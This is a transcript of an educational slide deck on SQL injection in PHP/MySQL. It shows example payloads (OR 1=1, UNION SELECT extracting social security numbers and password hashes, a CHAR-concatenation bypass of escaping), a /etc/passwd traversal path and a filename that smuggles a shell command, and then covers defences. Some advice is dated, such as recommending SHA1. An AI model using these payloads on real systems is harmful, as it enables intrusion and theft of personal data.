Presentation is loading. Please wait.

Presentation is loading. Please wait.

SQL Injection. Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker.

Published byLionel Gibbs Modified over 8 years ago

Similar presentations

Presentation on theme: "SQL Injection. Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker."— Presentation transcript:

1 SQL Injection

2 Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker

3 Who I Work For Streaming Media Hosting, Inc. Currently looking for a Senior Network and System Administrator - contact smtaylor@csupomona.edu for more information. smtaylor@csupomona.edu

4 Software Used PHP 5 MySQL 5 Apache 2 Vim (it’s better than Emacs)

5 What is SQL Injection?

6 Not a software flaw Arises with concatenation of dynamic queries Can be performed on anything using an SQL-based language, such as MySQL, PostgreSQL, MS-SQL, and others.

7 What is SQL Injection? $query = “SELECT * FROM my_table WHERE id = $_GET[‘id’]”;

8 What is SQL Injection?

9 Attack Techniques

10 Testing for injectable variables Toss in an apostrophe (‘) Mess with integers Throw in an always-true statement

11 Attack Techniques Throwing in apostrophes files.php?id=‘ SELECT * FROM my_table WHERE id = ‘ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

12 Attack Techniques Messing with integers files.php?id=1%20hello%20world! SELECT * FROM my_table WHERE id = 1 hello world! You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’hello world!' at line 1

13 Attack Techniques Always True Statements files.php?id=2%20OR%201=1%20--%20 SELECT * FROM my_table WHERE id = 2 OR 1=1 -- AND … Returns everything in my_table.

14 Attack Techniques The UNION keyword If you have a laptop with you, point yourself to http://www.technotaylor.net/secure/example1.php?showall=yes

15 Attack Techniques The UNION keyword Returns: …?showall=no' UNION SELECT social FROM social_securities --%20 quote in database: 111-11-1111 222-22-2222 333-33-3333 444-44-4444 555-55-5555 666-66-6666

16 Attack Techniques SELECT AS http://www.technotaylor.net/secure/example2.php

17 Attack Techniques SELECT AS Returns: …?id=30 UNION SELECT social AS quote FROM social_securities --%20 111-11-1111

18 Attack Techniques Multi-return vs. Single return Obviously can’t perform SELECT * How do we get around this for multiple values in a SELECT statement?

19 Attack Techniques Boolean operators can be performed practically everywhere Returns: … FROM social_securities WHERE social > ‘111-11-1111’ --%20 222-22-2222

20 Defense Techniques

21 Escaping quotes are not enough addslashes() and mysql_escape_string() in PHP won’t save you! http://www.technotaylor.net/secure/example3.php

22 Defense Techniques C-String Attack Replace any string in your injection query with a CONCAT of CHARs Returns: … SELECT FROM social_securities WHERE social > CONCAT(CHAR(49), CHAR(49), CHAR(49), CHAR(45)…) --%20 222-22-2222

23 Defense Techniques Take advantage of on-the-fly conversions Some databases, like MySQL, do on-the- fly conversions. For example, a string can be converted easily to an integer on the fly and vice-versa without needing to strictly cast. When strings are properly escaped, there is no breaking out of them.

24 Defense Techniques Cast your variables at the software layer PHP has a function called settype(), so you can be sure that if you’ve received a string it will always be an int

25 Defense Techniques If you have a pre-determined set of inputs, use them to your advantage. If you know the values are going to be “red”, “blue”, or “green”, create a switch- case declaration to verify the variables and dump anything else that comes in as invalid

26 Defense Techniques If you have a pre-determined length of input, limit the input length at the software layer If you only have input that’s 1-8, limit the length of the input to simply one character.

27 Defense Techniques Use prepared statements when possible PHP comes with an awesome SQL security suite called PearDB

28 Defense Techniques If prepared statements aren’t a possible solution, use SQL libraries built for this purpose SafeSQL http://www.phpinsider.com/php/code/SafeSQL/ StrictDB http://www.technotaylor.net/strictdb/

29 General Security Tips

30 PHP specific Never, ever, ever, EVER use eval() Don’t use $_REQUEST -- use $_GET, $_POST and $_COOKIE instead. Turn off magic_quotes_gpc-- they’re useless and annoying. Add “php_flag magic_quotes_gpc off” to your.htaccess file If you’re not debugging, turn off error reporting with error_reporting(0)

31 General Security Tips Cross-site scripting (aka XSS) Problem: user can put in HTML tags Solution: strip and replace all HTML-specific characters & => & “ => " ‘ => ' < > => > PHP has a function that does this for you-- htmlspecialchars(“string goes here”);

32 General Security Tips Directory traversal Problem: input argument is a file to be read on the server. Solution: don’t do that because it is very stupid. If someone puts in an argument for the file called “../../../etc/passwd”, congratulations, you’ve compromised your server by showing off the password file!

33 General Security Tips File uploads MIME types are never to be trusted. Neither are file extensions. To verify a file’s actual type, you may have to go as far as open the file and inspect its header information! Beware how you handle filenames: browsers can be manipulated to send malicious file extensions, such as “my_picture.jpg; cat../../../etc/passwd”

34 General Security Tips Password storing Don’t use two-way encryption MD5 has been broken-- use SHA1 Don’t forget to salt your hashes!

35 General Security Tips Salting your hashes Salting is appending or prepending an incoming a password with an 8-16 string of random characters and hashing the result. Salting keeps people from performing dictionary attacks on your database. http://www.technotaylor.net/secure/example4.php?showall=yes

36 General Security Tips An SQL-injected dictionary hash-attack Returns: …?showall=no’ UNION SELECT username FROM users WHERE hash = (SELECT hash FROM users WHERE username = 'CRASH_OVERRIDE') AND NOT username = 'CRASH_OVERRIDE' --%20 registered users in database: bob steve bill

37 More Information

38 Good ‘ol Wikipedia http://en.wikipedia.org/wiki/SQL_injection Toorcon presentation on SQL injection http://video.google.com/videoplay?docid=5773019 873031992689 http://video.google.com/videoplay?docid=5773019 873031992689 PHP Security whitepaper http://www.acunetix.com/websitesecurity/php_whit epaper.pdf

39 The End You have just lost The Game.

Download ppt "SQL Injection. Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker."

Similar presentations

PHP I.

PHP I.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
UFCE8V-20-3 Information Systems Development 3 (SHAPE HK) Lecture 3 PHP (2) : Functions, User Defined Functions & Environment Variables.

UFCE8V-20-3 Information Systems Development 3 (SHAPE HK) Lecture 3 PHP (2) : Functions, User Defined Functions & Environment Variables.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
SQL Injection Attacks Prof. Jim Whitehead CMPS 183: Spring 2006 May 17, 2006.

SQL Injection Attacks Prof. Jim Whitehead CMPS 183: Spring 2006 May 17, 2006.
PHP Intro/Overview Squirrel Book pages 33-87. Server-side Scripting Everything you need to know in one slide 1.Web server (with PHP “plug-in”) gets a.

PHP Intro/Overview Squirrel Book pages Server-side Scripting Everything you need to know in one slide 1.Web server (with PHP “plug-in”) gets a.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.

Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.
SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.

SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.

Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities
PHP Security.

PHP Security.
PHP : Hypertext Preprocessor

PHP : Hypertext Preprocessor
Databases with PHP A quick introduction. Y’all know SQL and Databases  You put data in  You get data out  You can do processing on it very easily 

Databases with PHP A quick introduction. Y’all know SQL and Databases  You put data in  You get data out  You can do processing on it very easily 
CSC 2720 Building Web Applications

CSC 2720 Building Web Applications

Similar presentations

Ads by Google